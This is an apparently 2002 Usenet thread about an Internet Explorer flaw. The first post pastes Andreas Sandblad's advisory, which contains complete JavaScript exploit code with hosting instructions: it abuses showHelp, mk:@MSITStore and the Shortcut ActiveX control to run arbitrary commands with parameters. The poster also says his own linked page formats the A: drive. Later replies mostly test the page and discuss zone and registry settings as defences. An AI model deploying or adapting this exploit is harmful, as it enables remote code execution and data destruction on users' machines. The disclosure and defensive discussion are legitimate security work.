DANGEROUS new security hole
Sugien
http://www.dino-soft.org/auto.html
The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
fully updated and patched windows system. If you go there make sure there
is nothing in the A:\ that formatting will harm; because this has been
tested
and works on Windows 2000 WinXP/home/corp/pro Win98/SE.
This is a harmless POC to give you experts here a heads up; because
Microsoft HAS been informed of the hole; but they seam to be sitting on
there hands maybe much like the recient XP hole that they knew about before
XP even shipped; but chose to wait until SP1 to correct.
This is VERY DANGEROUS, and this little harmless POC could quite
easley be made to be quite nasty; but when the author of the original hole
whos' hole I have sort of legoised<s> and made to work a very little bit
differently Microsoft had this to say to the original author:
"Microsoft was initially contacted 2002-10-04. After several mail exchanges,
their final response were that the technique used to runprograms with
parameters from the "Local computer zone" was no security vulnerability. A
fix should instead be applied for all possibilities for content in the
"Internet zone" to access the "Local computer zone".
Futher down I have included the orignal authors paper on this. As I said in
another post I will try very hard to give orignal authors any and all credit
they deserve and I can think of no better way then to include the orignal
work from which I created my sort of basterdized lego createon from<vbfg>
Any way. as I also said earler the "professionals" here can maybe get
Microsoft off their colective ars's and do something about this; because if
a medocre lego code programmer like me can figure out from his paper how to
do this then every script kiddy out there can also access the script from
the known location online where I got it from:
ENJOY:
<--begin orignal by author whos name is included in his work below-->
Title: "How to execute programs with parameters in IE"
Date: [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor: http://www.microsoft.com/
Impact: Javascript in "Internet zone" may
execute programs with parameters _ _
o' \,=./ `o
Author: Andreas Sandblad, sand...@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6
(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local
computer
zone" with less restrictions.
In the past we have seen many vulnerabilities where script in the
"Internet zone" could access the "Local computer zone". The script
could
do actions like:
- Read local files if the exact path is known and file can be opened
by
IE.
- Execute local programs (exact path required) WITHOUT parameters
using
the codebase attack.
It will be shown in this document how script in the "Local computer
zone"
can actually be designed to run arbitrary programs WITH parameters
(exact
path not needed). The technique used may open up far more dangerous
attacks than seen before.
(2) VENDOR STATUS:
==================
(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp
window.
2. Open an url (must begin with http://) in a separate winhelp window.
Script in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.
After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").
In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilites to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5)
is
trivial to achieve and will not affect the winhelp window for (2),
since
it is opened in a different window by default.
Before MS02-055 was released by Microsoft the above were a lot more
easier
to perform. (3) and (4) could then be skipped.
(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting"
vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.
In order for not having to put script in 3 separate files I have
combined
them into one single file. The script will check for text after the #
sign
in the url to determine what to perform (url's hash). If your computer
is
heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is
not
set directly by IE.
INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST
START
WITH HTTP://).
4. The script will open up a dos window and display a line of text,
create
the file c:/vulnerable.txt (write permission required) and start
winmine
(this excellent game must exist). The help window for IE will not be
closed.
TESTED:
Win2000 pro, XP, IE 6 Win98/SE (latest patches).
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sand...@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--
http://www.dino-soft.org
/}
@###{ ]::::::Dino-Soft Software::::::>
\}
http://home.adelphia.net/~dinosoft/online2.html
D McAuliffe
was due to my Local Zone settings being the same as those in the Restricted
Zone.
--
~~~~~~~~~~~~~~~~~
Dave McAuliffe
<Central Mass.> USA
Remove X from address
~~~~~~~~~~~~~~~~~
"Sugien" <dino...@adelphia.net> wrote in message
news:C_lz9.46631$Lg2.13...@news2.news.adelphia.net...
> #<--! Flame resistant undies engages
>
> http://www.dino-soft.org/auto.html
>
> The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
> fully updated and patched windows system. If you go there make sure there
> is nothing in the A:\ that formatting will harm; because this has been
> tested
> and works on Windows 2000 WinXP/home/corp/pro Win98/SE.
<snip>
Wessel
"D McAuliffe" <Dav...@emailX.com> schreef in bericht
news:aqlhv2$ask8h$1...@ID-37006.news.dfncis.de...
> Didn't work on my system (home user -W98SE - IE5.5 - updated). Perhaps it
> was due to my Local Zone settings being the same as those in the
Restricted
> Zone.
>
> --
Don't know if this would work for me at work, since I have a local server
running and use serverside scripting as well as client side.
But local zone settings as restricted xone could give protection against hta
files that sneak by. ;-)
Regards Wessel
xyZed
GMT, "Sugien" <dino...@adelphia.net> wrote
_______________________________________________________
>› #<--! Flame resistant undies engages
>›
>› http://www.dino-soft.org/auto.html
>›
>
Wasn't this fixed by M$ 5 months back.?
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-037.asp
--
It's a cruel world we live in. A man's lucky if he gets out alive.
www.washerhelp.com [remove mymask_ to email]
Wessel
"xyZed" <mymask...@blueyonder.co.uk> schreef in bericht
news:rutssuk1vgkl7ksii...@4ax.com...
> There is circumstantial evidence that on Sun, 10 Nov 2002 05:18:26
> GMT, "Sugien" <dino...@adelphia.net> wrote
> _______________________________________________________
>
> >> #<--! Flame resistant undies engages
> >>
> >> http://www.dino-soft.org/auto.html
> >>
> >
>
> Wasn't this fixed by M$ 5 months back.?
>
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS00-037.asp
> --
MS claims that it is not affected.
And on downloading it, it says that the computer allready has a newer
version.
HTH Wessel
bassbag
dino...@adelphia.net says...
When i click that url i get ablank page apart from "testing ie execute
exploit" and an ie script error.The error being...
object doesnt support this property or method..and nothing happens.Using
ie6 ,w98se
me
Bart Bailey
> #<--! Flame resistant undies engages
>
> http://www.dino-soft.org/auto.html
>
> The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
> fully updated and patched windows system. If you go there make sure there
> is nothing in the A:\ that formatting will harm; because this has been
> tested
> and works on Windows 2000 WinXP/home/corp/pro Win98/SE.
Win95b with either Opera or Netscape isn't affected at all.
> This is a harmless POC to give you experts here a heads up; because
> Microsoft HAS been informed of the hole; but they seam to be sitting on
> there hands maybe much like the recient XP hole that they knew about before
> XP even shipped; but chose to wait until SP1 to correct.
> This is VERY DANGEROUS, and this little harmless POC could quite
> easley be made to be quite nasty; but when the author of the original hole
> whos' hole I have sort of legoised<s> and made to work a very little bit
> differently Microsoft had this to say to the original author:
I suppose if I were using MSIE,
and had it configured for the most vulnerable behavior,
I would get something besides:
"Testing IE Execute Exploit"
Sugien
"xyZed" <mymask...@blueyonder.co.uk> wrote in message
news:rutssuk1vgkl7ksii...@4ax.com...
Not this incarnation, my test machine is probably kept more up to date then
my main system and on my test system with all the latest patches and service
packs and critical updates it still worked.
Sugien
"Bart Bailey" <bar...@nethere.net> wrote in message
news:3DCE969C...@sbcglobal.net...
I have only tested it on IE and it works here with all of the latest
security patches and service packs, but I do have the security set to
default because of course if you turn off JavaScript it won't work; but the
point is that at a default security setting it does work; because most all
normal users have there IE set to default settings; because most are afraid
to monkey around with it thinking they will mess it up and that it will cost
them big bucks to get it fixed.
Tim Downie
> "xyZed" <mymask...@blueyonder.co.uk> wrote in message
> news:rutssuk1vgkl7ksii...@4ax.com...
>> There is circumstantial evidence that on Sun, 10 Nov 2002 05:18:26
>> GMT, "Sugien" <dino...@adelphia.net> wrote
>> _______________________________________________________
>>
>>>> #<--! Flame resistant undies engages
>>>>
>>>> http://www.dino-soft.org/auto.html
>>>>
>>>
>>
>> Wasn't this fixed by M$ 5 months back.?
>>
>
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
> bulletin/MS00-037.asp
>> --
>>
>> It's a cruel world we live in. A man's lucky if he gets out alive.
>>
>> www.washerhelp.com [remove mymask_ to email]
>
> Not this incarnation, my test machine is probably kept more up to
> date then my main system and on my test system with all the latest
> patches and service packs and critical updates it still worked.
On my machine, (IE6, 98se, all service packs and security updates) it
merrily formats the A drive. Worrying.
Tim
---
Outgoing mail is certified as probably virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.417 / Virus Database: 233 - Release Date: 08/11/02
Sugien
"Tim Downie" <timdow...@yahoo.co.uk> wrote in message
news:aqmkpf$bmvh1$1...@ID-81538.news.dfncis.de...
right now the best fix is to either set JavaScript to prompt or to disable
it all together or set all the internet to the restricted zone
Nick FitzGerald
> Wasn't this fixed by M$ 5 months back.?
> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-037.asp
NO.
This newer vulnerability is readily exploited in IE 6.0 and 6.0SP1.
The bug the help file execution exploit took advantage of is long
fixed and essentially unrelated to this one. Read the Sandblad
advisory for the details of the "problem" here.
--
Nick FitzGerald
Nick FitzGerald
> Win95b with either Opera or Netscape isn't affected at all.
Not exactly surprising given it is explicitly an IE security model
exploit... Did you not read the Sandblad advisory?
> I suppose if I were using MSIE,
> and had it configured for the most vulnerable behavior,
> I would get something besides:
> "Testing IE Execute Exploit"
Not "most vulnerable" -- default.
All it depends on is JavaScript being enabled and the fundamental
brokenness of the (implementation of the) IE security model.
Yes folks -- if you use IE you _must_, at a minimum, disable
scripting in the Internet security zone. All those annoying popup
advertising scum who in the past used Scriptlet/TypeLib then the
Java exception exploit to change your IE favourites/Start Page/
Search Page/etc or to install their scummy spyware and/or adware
will now be rolling this into their arsenals as it is the first
easy remote arbitrary code exploit for IE 6.0...
Expect MS to patch this within -- oh, at least 6 months...
--
Nick FitzGerald
Nick FitzGerald
> Didn't work on my system (home user -W98SE - IE5.5 - updated). Perhaps it
> was due to my Local Zone settings being the same as those in the Restricted
> Zone.
The "Local Intranet" zone is irrelevant to this issue. The "Local
Computer" zone referred to in Sandblad's advisory is really the "My
Computer" security zone and means "files on the local system or
accessible via mapped drives _that are not in the 'special' folders
that represent (cached) Internet content_". There is no user
interface to the "Local Computer" security zone (which is correctly
known as the "My Computer" zone) in IE -- the only way you can see
or modify its settings is through careful use of the Registry
Editor. Look under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Note that there are _five_ entries -- in the keys named 0 - 4.
The first of those has the DisplayName value of "My Computer" and
the Description vaue of "Your computer".
I think I've heard of a couple of third-party tools that provide a
grapical interface to show the settings for this "hidden" security
zone, but I've not searched them out or tried them.
Finally, I think the exploit depends on some peculiarity of the IE
security model that is specific to IE 6.0 but again have not looked
that closely at its version dependencies. If so, it not working in
IE 5.5 would be "expected".
--
Nick FitzGerald
Nick FitzGerald
> When i click that url i get ablank page apart from "testing ie execute
> exploit" and an ie script error.The error being...
> object doesnt support this property or method..and nothing happens.Using
> ie6 ,w98se
Even if you set the security zones back to defaults?
--
Nick FitzGerald
bassbag
@yahoo.co.uk says...
the settings is sufficient to stop 99 % of vulnerabilities.
me
FromTheRafters
"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message
news:3dce...@clear.net.nz...
> Yes folks -- if you use IE you _must_, at a minimum, disable
> scripting in the Internet security zone. All those annoying popup
> advertising scum who in the past used Scriptlet/TypeLib then the
> Java exception exploit to change your IE favourites/Start Page/
> Search Page/etc or to install their scummy spyware and/or adware
> will now be rolling this into their arsenals as it is the first
> easy remote arbitrary code exploit for IE 6.0...
>
> Expect MS to patch this within -- oh, at least 6 months...
Hmmm....you're being a little conservative with your estimate
huh Nick!?
Sugien
"FromTheRafters" <!00...@nomad.fake> wrote in message
news:usubcl3...@corp.supernews.com...
M$ will probably wait until they collect up all the workarounds and serial
numbers that have been put out that bypass the SP1 fix for the bogus XP pro
cd's that used that same pirated CD key. That is why they waited to put out
the SP in the first place so that they could also include the zapper for all
the pirated XP CD's using that number and they were trying to wait to see if
any other CD keys showed up so they could be black listed. You can probably
expect that latest fix to get zapped in their next SP. I would not even put
it past M$ from putting in another hole in the SP knowing they could *claim*
to fix it later and along with that fix the workarounds people found to
there last pir8ted CD key zapper.
Bart Bailey
> "Bart Bailey" <bar...@nethere.net> wrote:
>
> > Win95b with either Opera or Netscape isn't affected at all.
>
> Not exactly surprising given it is explicitly an IE security model
> exploit... Did you not read the Sandblad advisory?
Nah, since the IE requirement wasn't stated,
I just clicked at it with all my browsers;
Netscape - v4.08
Opera - v6.05
Off-By-One - v3.2.J.2
>
> > I suppose if I were using MSIE,
> > and had it configured for the most vulnerable behavior,
> > I would get something besides:
> > "Testing IE Execute Exploit"
>
> Not "most vulnerable" -- default.
Is there a more vulnerable IE config than the default? <g>
> All it depends on is JavaScript being enabled and the fundamental
> brokenness of the (implementation of the) IE security model.
If you're gonna ride bareback with JavaScript, and everything else,
enabled, them might as well open file sharing with root access to C:\,
and see what a thrill the internet can be ;-)
bassbag
levels , and the blank screen apart from the testing ie exploit title.I
also get a windows help file opening.I use scriptrap , but it doesnt seem
to be that affecting it as it would open otherwise.Also firewall is not
blocking anything.Very strange.Im using myie although that uses the IE
engine so i wouldnt have thought its that.
me
Nick FitzGerald
> Yes ..i get the same script errors when settings are at lowest security
> levels , and the blank screen apart from the testing ie exploit title.I
> also get a windows help file opening.I use scriptrap , but it doesnt seem
> to be that affecting it as it would open otherwise.Also firewall is not
> blocking anything.Very strange.Im using myie although that uses the IE
> engine so i wouldnt have thought its that.
It turns out, according to the author of the exploit Soooooge based
"his" PoC on, that there are some more complex timing dependencies in
this exploit than originally thought. As I'd already seen the exploit
work in other pages that were only trivially different from Soooooge's
(they all have exactly the same scripting, just different values for
the "prog" and "args" variables) I hadn't actually tried Soooooge's.
On trying it on this machine, where two other basically identical PoC
pages worked fine, Soooooge's didn't work.
So, for whatever reason, it may not work on some others' machines
either, just as at least one of the other PoC pages for this exploit
that does work on my machine is reported by many to not work.
The latest post by the author of the original PoC is linked below,
for those interested:
http://online.securityfocus.com/archive/1/299230
--
Nick FitzGerald
D McAuliffe
Thanks for the direction. After finding an explanation for the zone
settings at:
http://support.microsoft.com/default.aspx?scid=KB;en-us;q182569
I did a spreadsheet on my system's settings and noticed and ask help with:
1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
binary. Do you recommend deleting then adding it back? My Zone 3 had a
similar problem, but was corrected through an Internet Properties change.
2) Zone 0's Flag is set at 33. If it were changed to 1, would the Zone
then appear in the Internet Properties window? (I'm assuming that 33 = 1+32
of the Flag values)
3) Zone 0, with few exceptions, is set to allow. If, for example, I
changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't do
that function in Windows Explorer?
I don't have a test computer and am not overly adventurous.
Art S
Interesting.
I just ran it on my system (XP Home, I.E. 6) and said yes whenever I
was asked if I would allow a script (3 times.).
I got a DOS window that has an invalid parameter - /autotest. The file
on my diskette is untouched.
Art
Nick FitzGerald
> Thanks for the direction. ...
You're welcome...
> ... After finding an explanation for the zone
> settings at:
> http://support.microsoft.com/default.aspx?scid=KB;en-us;q182569
...and thanks back for that link (I thought I had it bookmarked but
couldn't find it last night when writing my previous message...).
> I did a spreadsheet on my system's settings and noticed and ask help with:
> 1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
> binary. Do you recommend deleting then adding it back? My Zone 3 had a
> similar problem, but was corrected through an Internet Properties change.
Not sure. On two pre-IE60 machines here, all the non-string values
in all zones are of DWORD type, but on this laptop with IE60, as you
report, have zones 0 and 4 with the Java permissions value as a
DWORD but as a binary in all others...
> 2) Zone 0's Flag is set at 33. If it were changed to 1, would the Zone
> then appear in the Internet Properties window? (I'm assuming that 33 = 1+32
> of the Flag values)
The mat is correct and you are interpreting the Q-article as I do
but I've not tried it.
> 3) Zone 0, with few exceptions, is set to allow. If, for example, I
> changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't do
> that function in Windows Explorer?
Dunno...
> I don't have a test computer and am not overly adventurous.
Hey -- the worst that copuld happen is you stop drag'n'drop working
until you change the value back (and maybe reboot)... The trick is
to not change lots of things at once.
--
Nick FitzGerald
Nick FitzGerald
> Interesting.
>
> I just ran it on my system (XP Home, I.E. 6) and said yes whenever I
> was asked if I would allow a script (3 times.).
Living dangerously there Art! 8-)
> I got a DOS window that has an invalid parameter - /autotest. The file
> on my diskette is untouched.
The format.com with NT-based OSes does not support that switch.
I suggest that you try one of the sample PoC's exploits of this
vulnerability specifically designed for Win2K/XP use, such as the
one linked from the Sandblad post I linked in an earlier message
in this thread if having a command prompt pop open before your
eyes is not enough proof of the vulnerability's existence.
--
Nick FitzGerald
Antikillfile
Art S
"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message news:3dd221e8$1...@clear.net.nz...
on Win XP. Perhaps he meant the security hole, and not this
specific demonstration.
I suppose once you demonstrate that you can get a command
prompt invoked, 95% of the security hole has been demonstrated -
the rest is just taking advantage of it.
Art S.
D McAuliffe
Took your advice on #s 2 & 3, but 1 I'll leave alone.
> > 1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
> > binary. Do you recommend deleting then adding it back? My Zone 3 had a
> > similar problem, but was corrected through an Internet Properties
change.
>
> Not sure. On two pre-IE60 machines here, all the non-string values
> in all zones are of DWORD type, but on this laptop with IE60, as you
> report, have zones 0 and 4 with the Java permissions value as a
> DWORD but as a binary in all others...
>
> > 2) Zone 0's Flag is set at 33. If it were changed to 1, would the
Zone
> > then appear in the Internet Properties window? (I'm assuming that 33 =
1+32
> > of the Flag values)
>
> The mat is correct and you are interpreting the Q-article as I do
> but I've not tried it.
>
Changed the Flag to 1, now the "hidden zone" appears with the rest of the
zones.
> > 3) Zone 0, with few exceptions, is set to allow. If, for example, I
> > changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't
do
> > that function in Windows Explorer?
>
> Dunno...
>
> > I don't have a test computer and am not overly adventurous.
>
> Hey -- the worst that could happen is you stop drag'n'drop working
> until you change the value back (and maybe reboot)... The trick is
> to not change lots of things at once.
>
And that's exactly what happened. It stopped working, and wouldn't work
again until a reboot.